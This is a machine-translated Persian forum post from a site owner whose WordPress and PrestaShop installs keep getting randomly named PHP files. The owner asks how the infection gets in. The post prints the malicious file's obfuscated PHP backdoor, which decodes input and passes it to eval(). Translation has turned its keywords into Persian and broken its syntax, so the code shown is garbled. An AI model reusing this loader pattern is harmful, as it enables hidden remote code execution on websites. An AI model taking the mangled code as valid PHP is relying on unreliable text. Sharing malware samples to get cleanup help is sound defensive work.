من می بینم که فایل های پی اچ پی در دایرکتوری های چندگانه با نام های تصادفی که دارای کد زیر هستند را نشان می دهد: https://pastebin.com/Baus2eCV که به
`` `غلبه می کند
$ ajyhxyf) {
تابع ddrpid ($ mxgxe، $ qlfhzo، $ adusfqt) {
بازگشت $ mxgxe [6] ($ mxgxe [4] ($ qlfhzo. $ mxgxe [2]، ($ adusfqt / $ mxgxe [8] ($ qlfhzo)) + 1)، 0، $ adusfqt)؛
}
تابع myvswg ($ mxgxe، $ otdyni) {
بازگشت @ $ mxgxe [9] ($ mxgxe [0]، $ otdyni)؛
}
تابع vdklyzv ($ mxgxe، $ otdyni) {
$ vvtrzvc = $ mxgxe [3] ($ otdyni)٪ 3؛
اگر (! $ vvtrzvc) {
eval ($ otdyni [1] ($ otdyni [2]))؛
خروج ()؛
}
}
$ ajyhxyf = myvswg ($ mxgxe، $ ajyhxyf)؛
vdklyzv ($ mxgxe، $ mxgxe [5] ($ mxgxe [1]، $ ajyhxyf ^ ddrpid ($ mxgxe، $ qlfhzo، $ mxgxe [8] ($ ajyhxyf))))؛
}؟>
`` `
آنها اغلب سایت های وردپرس و یک نصب Prestashop هستند. من iThemes Security، Wordfence و GOTMLS را نصب کرده ام اما فایل ها هنوز به نمایش در می آیند. آنها همچنین در نصب Prestashop نشان داده می شوند.
من خودم می توانم نرم افزارهای مخرب را به صورت دستی تمیز کنم. مسئله نصب cpanel سخت تر است و این که چگونه این اتفاق می افتد. من تمام سایت ها را دانلود کرده ام و سایت های WordPress و فایل های اصلی را جایگزین / ارتقا داده ام، تمام پلاگین ها را به روز رسانی کرده اند و مجوز های فایل به عنوان iThemes توصیه می شود. در اینجا یک پرونده ورود به دایرکتوری / سایت مورد نظر است، اما من نمی دانم که من دنبال چه چیزی هستم: https://pastebin.com/pzrMMivr
از قبل سپاسگزارم.
